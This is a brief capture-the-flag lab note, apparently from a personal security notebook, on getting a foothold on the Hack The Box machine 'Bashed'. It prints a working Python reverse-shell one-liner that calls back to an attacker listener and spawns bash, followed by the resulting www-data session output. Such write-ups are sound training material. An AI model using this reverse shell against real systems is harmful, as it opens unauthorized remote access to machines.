InfoSec LAB

Bashed_Exploitation

Created: 1 min read

Reverse Shell

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.6",9999));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")' This is a python reverse shell to upgrade the current webshell 

┌──(kali㉿kali)-[~/archive/htb/labs/bashed]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.68] 37118
www-data@bashed:/var/www/html/dev$ whoami
whoami
www-data
www-data@bashed:/var/www/html/dev$ hostname
hostname
bashed
www-data@bashed:/var/www/html/dev$ ifconfig
ifconfig
ens33     link encap:Ethernet  HWaddr 00:50:56:b9:1c:78  
          inet addr:10.10.10.68  Bcast:10.10.10.255  Mask:255.255.255.255
          inet6 addr: dead:beef::250:56ff:feb9:1c78/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:1c78/64 Scope:Link
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:6080 errors:0 dropped:121 overruns:0 frame:0
          tx packets:1325 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:649179 (649.1 KB)  TX bytes:1945845 (1.9 MB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:65536  Metric:1
          rx packets:157680 errors:0 dropped:0 overruns:0 frame:0
          tx packets:157680 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          rx bytes:11670320 (11.6 MB)  TX bytes:11670320 (11.6 MB)

Initial Foothold as www-data

Interactive Graph View

Backlinks